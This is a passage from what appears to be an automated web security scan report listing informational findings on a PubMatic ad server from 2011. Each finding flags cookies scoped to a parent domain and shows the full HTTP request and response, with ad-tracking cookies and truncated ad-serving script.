Cookie: KRTBCOOKIE_57=476-uid:6422714091563403120; KRTBCOOKIE_107=1471-uid:NPgmRuqc1g7o5ImOP5HZYnndqUL92n1F; KRTBCOOKIE_148=1699-uid:439524AE8C6B634E021F5F7802166020; KADUSERCOOKIE=55785307-A5DC-4E3A-B452-DDBD426D3A1D; PMAT=0; KRTBCOOKIE_80=1336-d454714d-69b5-4195-969b-ba426f1012c3.; KRTBCOOKIE_58=1344-OO-00000000000000000; KRTBCOOKIE_22=488-pcv:1|uid:2944787775510337379; KRTBCOOKIE_27=1216-uid:; KRTBCOOKIE_218=4056--5675633421699857517=; KRTBCOOKIE_200=3683-d0f5e0cea474; KRTBCOOKIE_16=226-3620501663059719663; pubtime_27331=TMC; PUBRETARGET=78_1409703834.82_1409705283.571_1410012888.806_1346872847.390_1323779603.445_1323779616.362_1318595605.76_1318595649.70_1318595646.2191_1331555757.2018_1318595758; USCC=ONE; KTPCACOOKIE=YES; PUBMDCID=1; PMDTSHR=cat:

Response

HTTP/1.1 200 OK
Server: Apache/2.2.4 (Unix) DAV/2 mod_fastcgi/2.4.2
Vary: Accept-Encoding
P3P: CP="NOI DSP COR LAW CUR ADMo DEVo TAIo PSAo PSDo IVAo IVDo HISo OTPo OUR SAMo BUS UNI COM NAV INT DEM CNT STA PRE LOC"
Cache-Control: no-store, no-cache, private
Pragma: no-cache
Content-Type: text/html
Date: Sat, 17 Sep 2011 01:06:09 GMT
Content-Length: 1857
Connection: close
Set-Cookie: PUBMDCID=1; domain=pubmatic.com; expires=Sun, 16-Sep-2012 01:06:09 GMT; path=/
Set-Cookie: pubfreq_27331_22455_684268577=1053-1; domain=pubmatic.com; expires=Sat, 17-Sep-2011 01:46:09 GMT; path=/
Set-Cookie: PMDTSHR=cat:; domain=pubmatic.com; expires=Sun, 18-Sep-2011 01:06:09 GMT; path=/

document.write('<div id="http_bostonherald_comincludesprocessAds_bgkomli_ads_frame12733027331" style="position: absolute; margin: 0px 0px 0px 0px; height: 0px; width: 0px; top: -10000px; " clickdata=w
...[SNIP]...

11.144. http://showadsak.pubmatic.com/AdServer/AdServerServlet  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://showadsak.pubmatic.com
Path:   /AdServer/AdServerServlet

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /AdServer/AdServerServlet?operId=2&pubId=27330&siteId=27331&adId=23103&kadwidth=728&kadheight=90&kbgColor=&ktextColor=&klinkColor=&pageURL=http://bostonherald.com/includes/processAds.bg&frameName=http_bostonherald_comincludesprocessAds_bgkomli_ads_frame12733027331&kltstamp=2011-8-17%201%3A5%3A34&ranreq=0.13483623624779284&timezone=-5&screenResolution=1920x1200&inIframe=1 HTTP/1.1
Host: showadsak.pubmatic.com
Proxy-Connection: keep-alive
Referer: http://bostonherald.com/includes/processAds.bg?position=Bottom&companion=Top,Middle,Middle1,Right,Bottom&page=bh.heraldinteractive.com%2Fnews%2Fnational%2Fremembering_911%2Fhome
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: KRTBCOOKIE_57=476-uid:6422714091563403120; KRTBCOOKIE_107=1471-uid:NPgmRuqc1g7o5ImOP5HZYnndqUL92n1F; KRTBCOOKIE_148=1699-uid:439524AE8C6B634E021F5F7802166020; KADUSERCOOKIE=55785307-A5DC-4E3A-B452-DDBD426D3A1D; PMAT=0; KRTBCOOKIE_80=1336-d454714d-69b5-4195-969b-ba426f1012c3.; KRTBCOOKIE_58=1344-OO-00000000000000000; KRTBCOOKIE_22=488-pcv:1|uid:2944787775510337379; KRTBCOOKIE_27=1216-uid:; KRTBCOOKIE_218=4056--5675633421699857517=; KRTBCOOKIE_200=3683-d0f5e0cea474; KRTBCOOKIE_16=226-3620501663059719663; pubtime_27331=TMC; PUBRETARGET=78_1409703834.82_1409705283.571_1410012888.806_1346872847.390_1323779603.445_1323779616.362_1318595605.76_1318595649.70_1318595646.2191_1331555757.2018_1318595758; KTPCACOOKIE=YES; SYNCUPPIX_ON=YES; USCC=ONE; DPPIX_ON=YES; PUBMDCID=1; PMDTSHR=cat:

Response

HTTP/1.1 200 OK
Server: Apache/2.2.4 (Unix) DAV/2 mod_fastcgi/2.4.2
Vary: Accept-Encoding
P3P: CP="NOI DSP COR LAW CUR ADMo DEVo TAIo PSAo PSDo IVAo IVDo HISo OTPo OUR SAMo BUS UNI COM NAV INT DEM CNT STA PRE LOC"
Cache-Control: no-store, no-cache, private
Pragma: no-cache
Content-Type: text/html
Date: Sat, 17 Sep 2011 01:04:08 GMT
Content-Length: 1936
Connection: close
Set-Cookie: PUBMDCID=1; domain=pubmatic.com; expires=Sun, 16-Sep-2012 01:04:08 GMT; path=/
Set-Cookie: pubfreq_27331_23103_1226431966=1053-1; domain=pubmatic.com; expires=Sat, 17-Sep-2011 01:44:08 GMT; path=/
Set-Cookie: PMDTSHR=cat:; domain=pubmatic.com; expires=Sun, 18-Sep-2011 01:04:08 GMT; path=/

document.write('<div id="http_bostonherald_comincludesprocessAds_bgkomli_ads_frame12733027331" style="position: absolute; margin: 0px 0px 0px 0px; height: 0px; width: 0px; top: -10000px; " clickdata=w
...[SNIP]...

11.145. http://showadsak.pubmatic.com/AdServer/AdServerServlet  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://showadsak.pubmatic.com
Path:   /AdServer/AdServerServlet

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /AdServer/AdServerServlet?operId=2&pubId=27330&siteId=27331&adId=23102&kadwidth=300&kadheight=250&kbgColor=&ktextColor=&klinkColor=&pageURL=http://bostonherald.com/includes/processAds.bg&frameName=http_bostonherald_comincludesprocessAds_bgkomli_ads_frame12733027331&kltstamp=2011-8-17%201%3A5%3A34&ranreq=0.6695490968413651&timezone=-5&screenResolution=1920x1200&inIframe=1 HTTP/1.1
Host: showadsak.pubmatic.com
Proxy-Connection: keep-alive
Referer: http://bostonherald.com/includes/processAds.bg?position=Middle1&companion=Top,Middle,Middle1,Right,Bottom&page=bh.heraldinteractive.com%2Fnews%2Fnational%2Fremembering_911%2Fhome
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: KRTBCOOKIE_57=476-uid:6422714091563403120; KRTBCOOKIE_107=1471-uid:NPgmRuqc1g7o5ImOP5HZYnndqUL92n1F; KRTBCOOKIE_148=1699-uid:439524AE8C6B634E021F5F7802166020; KADUSERCOOKIE=55785307-A5DC-4E3A-B452-DDBD426D3A1D; PMAT=0; KRTBCOOKIE_80=1336-d454714d-69b5-4195-969b-ba426f1012c3.; KRTBCOOKIE_58=1344-OO-00000000000000000; KRTBCOOKIE_22=488-pcv:1|uid:2944787775510337379; KRTBCOOKIE_27=1216-uid:; KRTBCOOKIE_218=4056--5675633421699857517=; KRTBCOOKIE_200=3683-d0f5e0cea474; KRTBCOOKIE_16=226-3620501663059719663; pubtime_27331=TMC; PUBRETARGET=78_1409703834.82_1409705283.571_1410012888.806_1346872847.390_1323779603.445_1323779616.362_1318595605.76_1318595649.70_1318595646.2191_1331555757.2018_1318595758; KTPCACOOKIE=YES; SYNCUPPIX_ON=YES; USCC=ONE; DPPIX_ON=YES; PUBMDCID=1; PMDTSHR=cat:

Response

HTTP/1.1 200 OK
Server: Apache/2.2.4 (Unix) DAV/2 mod_fastcgi/2.4.2
Vary: Accept-Encoding
P3P: CP="NOI DSP COR LAW CUR ADMo DEVo TAIo PSAo PSDo IVAo IVDo HISo OTPo OUR SAMo BUS UNI COM NAV INT DEM CNT STA PRE LOC"
Cache-Control: no-store, no-cache, private
Pragma: no-cache
Content-Type: text/html
Date: Sat, 17 Sep 2011 01:04:08 GMT
Content-Length: 1943
Connection: close
Set-Cookie: PUBMDCID=1; domain=pubmatic.com; expires=Sun, 16-Sep-2012 01:04:08 GMT; path=/
Set-Cookie: pubfreq_27331_23102_1450402887=1053-1; domain=pubmatic.com; expires=Sat, 17-Sep-2011 01:44:08 GMT; path=/
Set-Cookie: PMDTSHR=cat:; domain=pubmatic.com; expires=Sun, 18-Sep-2011 01:04:08 GMT; path=/

document.write('<div id="http_bostonherald_comincludesprocessAds_bgkomli_ads_frame12733027331" style="position: absolute; margin: 0px 0px 0px 0px; height: 0px; width: 0px; top: -10000px; " clickdata=w
...[SNIP]...

11.146. http://showadsak.pubmatic.com/AdServer/AdServerServlet  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://showadsak.pubmatic.com
Path:   /AdServer/AdServerServlet

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /AdServer/AdServerServlet?operId=2&pubId=27330&siteId=27331&adId=23102&kadwidth=300&kadheight=250&kbgColor=&ktextColor=&klinkColor=&pageURL=http://bostonherald.com/includes/processAds.bg&frameName=http_bostonherald_comincludesprocessAds_bgkomli_ads_frame12733027331&kltstamp=2011-8-17%201%3A7%3A35&ranreq=0.5457091238349676&timezone=-5&screenResolution=1920x1200&inIframe=1 HTTP/1.1
Host: showadsak.pubmatic.com
Proxy-Connection: keep-alive
Referer: http://bostonherald.com/includes/processAds.bg?position=Middle1&companion=Top,Middle,Middle1,Bottom&page=bh.heraldinteractive.com%2Ftrack%2Fhome
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: KRTBCOOKIE_57=476-uid:6422714091563403120; KRTBCOOKIE_107=1471-uid:NPgmRuqc1g7o5ImOP5HZYnndqUL92n1F; KRTBCOOKIE_148=1699-uid:439524AE8C6B634E021F5F7802166020; KADUSERCOOKIE=55785307-A5DC-4E3A-B452-DDBD426D3A1D; PMAT=0; KRTBCOOKIE_80=1336-d454714d-69b5-4195-969b-ba426f1012c3.; KRTBCOOKIE_58=1344-OO-00000000000000000; KRTBCOOKIE_22=488-pcv:1|uid:2944787775510337379; KRTBCOOKIE_27=1216-uid:; KRTBCOOKIE_218=4056--5675633421699857517=; KRTBCOOKIE_200=3683-d0f5e0cea474; KRTBCOOKIE_16=226-3620501663059719663; pubtime_27331=TMC; PUBRETARGET=78_1409703834.82_1409705283.571_1410012888.806_1346872847.390_1323779603.445_1323779616.362_1318595605.76_1318595649.70_1318595646.2191_1331555757.2018_1318595758; USCC=ONE; PMDTSHR=cat:; KTPCACOOKIE=YES; PUBMDCID=1

Response

HTTP/1.1 200 OK
Server: Apache/2.2.4 (Unix) DAV/2 mod_fastcgi/2.4.2
Vary: Accept-Encoding
P3P: CP="NOI DSP COR LAW CUR ADMo DEVo TAIo PSAo PSDo IVAo IVDo HISo OTPo OUR SAMo BUS UNI COM NAV INT DEM CNT STA PRE LOC"
Cache-Control: no-store, no-cache, private
Pragma: no-cache
Content-Type: text/html
Date: Sat, 17 Sep 2011 01:06:09 GMT
Content-Length: 1939
Connection: close
Set-Cookie: PUBMDCID=1; domain=pubmatic.com; expires=Sun, 16-Sep-2012 01:06:09 GMT; path=/
Set-Cookie: pubfreq_27331_23102_732226317=1053-1; domain=pubmatic.com; expires=Sat, 17-Sep-2011 01:46:09 GMT; path=/
Set-Cookie: PMDTSHR=cat:; domain=pubmatic.com; expires=Sun, 18-Sep-2011 01:06:09 GMT; path=/

document.write('<div id="http_bostonherald_comincludesprocessAds_bgkomli_ads_frame12733027331" style="position: absolute; margin: 0px 0px 0px 0px; height: 0px; width: 0px; top: -10000px; " clickdata=w
...[SNIP]...

11.147. http://showadsak.pubmatic.com/AdServer/AdServerServlet  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://showadsak.pubmatic.com
Path:   /AdServer/AdServerServlet

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /AdServer/AdServerServlet?operId=2&pubId=27330&siteId=27331&adId=23101&kadwidth=160&kadheight=600&kbgColor=&ktextColor=&klinkColor=&pageURL=http://bostonherald.com/includes/processAds.bg&frameName=http_bostonherald_comincludesprocessAds_bgkomli_ads_frame12733027331&kltstamp=2011-8-17%201%3A4%3A13&ranreq=0.38578117452561855&timezone=-5&screenResolution=1920x1200&inIframe=1 HTTP/1.1
Host: showadsak.pubmatic.com
Proxy-Connection: keep-alive
Referer: http://bostonherald.com/includes/processAds.bg?position=Right&companion=Top,Right,Bottom&page=bh.heraldinteractive.com%2Ftrack%2Fstar_tracks%2Farticle
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: KRTBCOOKIE_57=476-uid:6422714091563403120; KRTBCOOKIE_107=1471-uid:NPgmRuqc1g7o5ImOP5HZYnndqUL92n1F; KRTBCOOKIE_148=1699-uid:439524AE8C6B634E021F5F7802166020; KADUSERCOOKIE=55785307-A5DC-4E3A-B452-DDBD426D3A1D; PMAT=0; KRTBCOOKIE_80=1336-d454714d-69b5-4195-969b-ba426f1012c3.; KRTBCOOKIE_58=1344-OO-00000000000000000; KRTBCOOKIE_22=488-pcv:1|uid:2944787775510337379; KRTBCOOKIE_27=1216-uid:; KRTBCOOKIE_218=4056--5675633421699857517=; KRTBCOOKIE_200=3683-d0f5e0cea474; KRTBCOOKIE_16=226-3620501663059719663; pubtime_27331=TMC; PUBRETARGET=78_1409703834.82_1409705283.571_1410012888.806_1346872847.390_1323779603.445_1323779616.362_1318595605.76_1318595649.70_1318595646.2191_1331555757.2018_1318595758; USCC=ONE; PMDTSHR=cat:; PUBMDCID=1; KTPCACOOKIE=YES

Response

HTTP/1.1 200 OK
Server: Apache/2.2.4 (Unix) DAV/2 mod_fastcgi/2.4.2
Vary: Accept-Encoding
P3P: CP="NOI DSP COR LAW CUR ADMo DEVo TAIo PSAo PSDo IVAo IVDo HISo OTPo OUR SAMo BUS UNI COM NAV INT DEM CNT STA PRE LOC"
Cache-Control: no-store, no-cache, private
Pragma: no-cache
Content-Type: text/html
Date: Sat, 17 Sep 2011 01:02:48 GMT
Content-Length: 1868
Connection: close
Set-Cookie: PUBMDCID=1; domain=pubmatic.com; expires=Sun, 16-Sep-2012 01:02:48 GMT; path=/
Set-Cookie: pubfreq_27331_23101_1710273189=1053-1; domain=pubmatic.com; expires=Sat, 17-Sep-2011 01:42:48 GMT; path=/
Set-Cookie: PMDTSHR=cat:; domain=pubmatic.com; expires=Sun, 18-Sep-2011 01:02:48 GMT; path=/

document.write('<div id="http_bostonherald_comincludesprocessAds_bgkomli_ads_frame12733027331" style="position: absolute; margin: 0px 0px 0px 0px; height: 0px; width: 0px; top: -10000px; " clickdata=w
...[SNIP]...

11.148. http://showadsak.pubmatic.com/AdServer/AdServerServlet  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://showadsak.pubmatic.com
Path:   /AdServer/AdServerServlet

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /AdServer/AdServerServlet?operId=2&pubId=27330&siteId=27331&adId=22455&kadwidth=728&kadheight=90&kadNetwork=1053&kbgColor=ffffff&ktextColor=000000&klinkColor=0000EE&pageURL=http://ad.afy11.net/ad&frameName=http_ad_afy11_netadkomli_ads_frame12733027331&kltstamp=2011-8-17%201%3A8%3A23&ranreq=0.775478285504505&timezone=-5&screenResolution=1920x1200&inIframe=1&adPosition=-1x-1&adVisibility=0 HTTP/1.1
Host: showadsak.pubmatic.com
Proxy-Connection: keep-alive
Referer: http://ad.afy11.net/ad?asId=1000005414407&sd=2x728x90&ct=15&enc=0&nif=0&sf=0&sfd=0&ynw=0&anw=1&rand=41899200&rk1=79777040&rk2=1316239703.524&pt=0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: KRTBCOOKIE_57=476-uid:6422714091563403120; KRTBCOOKIE_107=1471-uid:NPgmRuqc1g7o5ImOP5HZYnndqUL92n1F; KRTBCOOKIE_148=1699-uid:439524AE8C6B634E021F5F7802166020; KADUSERCOOKIE=55785307-A5DC-4E3A-B452-DDBD426D3A1D; PMAT=0; KRTBCOOKIE_80=1336-d454714d-69b5-4195-969b-ba426f1012c3.; KRTBCOOKIE_58=1344-OO-00000000000000000; KRTBCOOKIE_22=488-pcv:1|uid:2944787775510337379; KRTBCOOKIE_27=1216-uid:; KRTBCOOKIE_218=4056--5675633421699857517=; KRTBCOOKIE_200=3683-d0f5e0cea474; KRTBCOOKIE_16=226-3620501663059719663; pubtime_27331=TMC; PUBRETARGET=78_1409703834.82_1409705283.571_1410012888.806_1346872847.390_1323779603.445_1323779616.362_1318595605.76_1318595649.70_1318595646.2191_1331555757.2018_1318595758; SYNCUPPIX_ON=YES; USCC=ONE; DPPIX_ON=YES; PMDTSHR=cat:; PUBMDCID=1; KTPCACOOKIE=YES

Response

HTTP/1.1 200 OK
Server: Apache/2.2.4 (Unix) DAV/2 mod_fastcgi/2.4.2
Vary: Accept-Encoding
P3P: CP="NOI DSP COR LAW CUR ADMo DEVo TAIo PSAo PSDo IVAo IVDo HISo OTPo OUR SAMo BUS UNI COM NAV INT DEM CNT STA PRE LOC"
Cache-Control: no-store, no-cache, private
Pragma: no-cache
Content-Type: text/html
Date: Sat, 17 Sep 2011 01:06:57 GMT
Content-Length: 1305
Connection: close
Set-Cookie: PUBMDCID=1; domain=pubmatic.com; expires=Sun, 16-Sep-2012 01:06:57 GMT; path=/
Set-Cookie: pubfreq_27331_22455_368828559=661-1; domain=pubmatic.com; expires=Sat, 17-Sep-2011 01:46:57 GMT; path=/

document.write('<div id="http_ad_afy11_netadkomli_ads_frame12733027331" style="position: absolute; margin: 0px 0px 0px 0px; height: 0px; width: 0px; top: -10000px; " clickdata=wmoAAMNqAAC3VwAAAAAAAAAA
...[SNIP]...

11.149. http://showadsak.pubmatic.com/AdServer/AdServerServlet  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://showadsak.pubmatic.com
Path:   /AdServer/AdServerServlet

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /AdServer/AdServerServlet?operId=2&pubId=27330&siteId=27331&adId=23101&kadwidth=160&kadheight=600&kadNetwork=661&prevkadIds=23101&kbgColor=&ktextColor=&klinkColor=&pageURL=http://ad.afy11.net/ad&frameName=http_ad_afy11_netadkomli_ads_frame22733027331&kltstamp=2011-8-17%201%3A7%3A44&ranreq=0.8369050135370344&timezone=-5&screenResolution=1920x1200&inIframe=1&adPosition=-1x-1&adVisibility=0 HTTP/1.1
Host: showadsak.pubmatic.com
Proxy-Connection: keep-alive
Referer: http://ad.afy11.net/ad?asId=1000005414307&sd=2x160x600&ct=15&enc=0&nif=0&sf=0&sfd=0&ynw=0&anw=1&rand=29230852&rk1=58438691&rk2=1316239663.676&pt=0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: KRTBCOOKIE_57=476-uid:6422714091563403120; KRTBCOOKIE_107=1471-uid:NPgmRuqc1g7o5ImOP5HZYnndqUL92n1F; KRTBCOOKIE_148=1699-uid:439524AE8C6B634E021F5F7802166020; KADUSERCOOKIE=55785307-A5DC-4E3A-B452-DDBD426D3A1D; PMAT=0; KRTBCOOKIE_80=1336-d454714d-69b5-4195-969b-ba426f1012c3.; KRTBCOOKIE_58=1344-OO-00000000000000000; KRTBCOOKIE_22=488-pcv:1|uid:2944787775510337379; KRTBCOOKIE_27=1216-uid:; KRTBCOOKIE_218=4056--5675633421699857517=; KRTBCOOKIE_200=3683-d0f5e0cea474; KRTBCOOKIE_16=226-3620501663059719663; pubtime_27331=TMC; PUBRETARGET=78_1409703834.82_1409705283.571_1410012888.806_1346872847.390_1323779603.445_1323779616.362_1318595605.76_1318595649.70_1318595646.2191_1331555757.2018_1318595758; SYNCUPPIX_ON=YES; USCC=ONE; DPPIX_ON=YES; PMDTSHR=cat:; KTPCACOOKIE=YES; PUBMDCID=1

Response

HTTP/1.1 200 OK
Server: Apache/2.2.4 (Unix) DAV/2 mod_fastcgi/2.4.2
Vary: Accept-Encoding
P3P: CP="NOI DSP COR LAW CUR ADMo DEVo TAIo PSAo PSDo IVAo IVDo HISo OTPo OUR SAMo BUS UNI COM NAV INT DEM CNT STA PRE LOC"
Cache-Control: no-store, no-cache, private
Pragma: no-cache
Content-Type: text/html
Date: Sat, 17 Sep 2011 01:06:18 GMT
Content-Length: 1573
Connection: close
Set-Cookie: PUBMDCID=1; domain=pubmatic.com; expires=Sun, 16-Sep-2012 01:06:18 GMT; path=/
Set-Cookie: pubfreq_27331_23101_1691138729=1058-1; domain=pubmatic.com; expires=Sat, 17-Sep-2011 01:46:18 GMT; path=/

document.write('<div id="http_ad_afy11_netadkomli_ads_frame22733027331" style="position: absolute; margin: 0px 0px 0px 0px; height: 0px; width: 0px; top: -10000px; " clickdata=wmoAAMNqAAA9WgAAAAAAAAAA
...[SNIP]...

11.150. http://showadsak.pubmatic.com/AdServer/AdServerServlet  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://showadsak.pubmatic.com
Path:   /AdServer/AdServerServlet

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /AdServer/AdServerServlet?operId=2&pubId=27330&siteId=27331&adId=23103&kadwidth=728&kadheight=90&kbgColor=&ktextColor=&klinkColor=&pageURL=http://bostonherald.com/includes/processAds.bg&frameName=http_bostonherald_comincludesprocessAds_bgkomli_ads_frame12733027331&kltstamp=2011-8-17%201%3A7%3A41&ranreq=0.5777826504781842&timezone=-5&screenResolution=1920x1200&inIframe=1 HTTP/1.1
Host: showadsak.pubmatic.com
Proxy-Connection: keep-alive
Referer: http://bostonherald.com/includes/processAds.bg?position=Bottom&companion=Top,Right,Middle,Bottom&page=bh.heraldinteractive.com%2Ftrack%2Finside_track%2Farticle
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: KRTBCOOKIE_57=476-uid:6422714091563403120; KRTBCOOKIE_107=1471-uid:NPgmRuqc1g7o5ImOP5HZYnndqUL92n1F; KRTBCOOKIE_148=1699-uid:439524AE8C6B634E021F5F7802166020; KADUSERCOOKIE=55785307-A5DC-4E3A-B452-DDBD426D3A1D; PMAT=0; KRTBCOOKIE_80=1336-d454714d-69b5-4195-969b-ba426f1012c3.; KRTBCOOKIE_58=1344-OO-00000000000000000; KRTBCOOKIE_22=488-pcv:1|uid:2944787775510337379; KRTBCOOKIE_27=1216-uid:; KRTBCOOKIE_218=4056--5675633421699857517=; KRTBCOOKIE_200=3683-d0f5e0cea474; KRTBCOOKIE_16=226-3620501663059719663; pubtime_27331=TMC; PUBRETARGET=78_1409703834.82_1409705283.571_1410012888.806_1346872847.390_1323779603.445_1323779616.362_1318595605.76_1318595649.70_1318595646.2191_1331555757.2018_1318595758; KTPCACOOKIE=YES; USCC=ONE; PUBMDCID=1; PMDTSHR=cat:

Response

HTTP/1.1 200 OK
Server: Apache/2.2.4 (Unix) DAV/2 mod_fastcgi/2.4.2
Vary: Accept-Encoding
P3P: CP="NOI DSP COR LAW CUR ADMo DEVo TAIo PSAo PSDo IVAo IVDo HISo OTPo OUR SAMo BUS UNI COM NAV INT DEM CNT STA PRE LOC"
Cache-Control: no-store, no-cache, private
Pragma: no-cache
Content-Type: text/html
Date: Sat, 17 Sep 2011 01:06:15 GMT
Content-Length: 1939
Connection: close
Set-Cookie: PUBMDCID=1; domain=pubmatic.com; expires=Sun, 16-Sep-2012 01:06:14 GMT; path=/
Set-Cookie: pubfreq_27331_23103_135328502=1053-1; domain=pubmatic.com; expires=Sat, 17-Sep-2011 01:46:15 GMT; path=/
Set-Cookie: PMDTSHR=cat:; domain=pubmatic.com; expires=Sun, 18-Sep-2011 01:06:15 GMT; path=/

document.write('<div id="http_bostonherald_comincludesprocessAds_bgkomli_ads_frame12733027331" style="position: absolute; margin: 0px 0px 0px 0px; height: 0px; width: 0px; top: -10000px; " clickdata=w
...[SNIP]...

11.151. http://showadsak.pubmatic.com/AdServer/AdServerServlet  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://showadsak.pubmatic.com
Path:   /AdServer/AdServerServlet

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /AdServer/AdServerServlet?operId=2&pubId=27330&siteId=27331&adId=23103&kadwidth=728&kadheight=90&kadNetwork=1053&kbgColor=ffffff&ktextColor=000000&klinkColor=0000EE&pageURL=http://ad.afy11.net/ad&frameName=http_ad_afy11_netadkomli_ads_frame12733027331&kltstamp=2011-8-17%201%3A7%3A3&ranreq=0.09347362210974097&timezone=-5&screenResolution=1920x1200&inIframe=1&adPosition=-1x-1&adVisibility=0 HTTP/1.1
Host: showadsak.pubmatic.com
Proxy-Connection: keep-alive
Referer: http://ad.afy11.net/ad?asId=1000007248707&sd=2x728x90&ct=15&enc=0&nif=0&sf=0&sfd=0&ynw=0&anw=1&rand=30568955&rk1=84725501&rk2=1316239623.514&pt=0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: KRTBCOOKIE_57=476-uid:6422714091563403120; KRTBCOOKIE_107=1471-uid:NPgmRuqc1g7o5ImOP5HZYnndqUL92n1F; KRTBCOOKIE_148=1699-uid:439524AE8C6B634E021F5F7802166020; KADUSERCOOKIE=55785307-A5DC-4E3A-B452-DDBD426D3A1D; PMAT=0; KRTBCOOKIE_80=1336-d454714d-69b5-4195-969b-ba426f1012c3.; KRTBCOOKIE_58=1344-OO-00000000000000000; KRTBCOOKIE_22=488-pcv:1|uid:2944787775510337379; KRTBCOOKIE_27=1216-uid:; KRTBCOOKIE_218=4056--5675633421699857517=; KRTBCOOKIE_200=3683-d0f5e0cea474; KRTBCOOKIE_16=226-3620501663059719663; pubtime_27331=TMC; PUBRETARGET=78_1409703834.82_1409705283.571_1410012888.806_1346872847.390_1323779603.445_1323779616.362_1318595605.76_1318595649.70_1318595646.2191_1331555757.2018_1318595758; KTPCACOOKIE=YES; SYNCUPPIX_ON=YES; USCC=ONE; DPPIX_ON=YES; PUBMDCID=1; PMDTSHR=cat:

Response

HTTP/1.1 200 OK
Server: Apache/2.2.4 (Unix) DAV/2 mod_fastcgi/2.4.2
Vary: Accept-Encoding
P3P: CP="NOI DSP COR LAW CUR ADMo DEVo TAIo PSAo PSDo IVAo IVDo HISo OTPo OUR SAMo BUS UNI COM NAV INT DEM CNT STA PRE LOC"
Cache-Control: no-store, no-cache, private
Pragma: no-cache
Content-Type: text/html
Date: Sat, 17 Sep 2011 01:05:37 GMT
Content-Length: 1837
Connection: close
Set-Cookie: PUBMDCID=1; domain=pubmatic.com; expires=Sun, 16-Sep-2012 01:05:37 GMT; path=/
Set-Cookie: _curtime=1316221537; domain=pubmatic.com; expires=Sat, 17-Sep-2011 02:15:37 GMT; path=/
Set-Cookie: pubfreq_27331_23103_1564788760=243-1; domain=pubmatic.com; expires=Sat, 17-Sep-2011 01:45:37 GMT; path=/

document.writeln('<'+'script type="text/javascript"> document.writeln(\'<iframe width="728" scrolling="no" height="90" frameborder="0" name="iframe0" allowtransparency="true" marginheight="0" marginwi
...[SNIP]...

11.152. http://showadsak.pubmatic.com/AdServer/AdServerServlet  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://showadsak.pubmatic.com
Path:   /AdServer/AdServerServlet

Issue detail

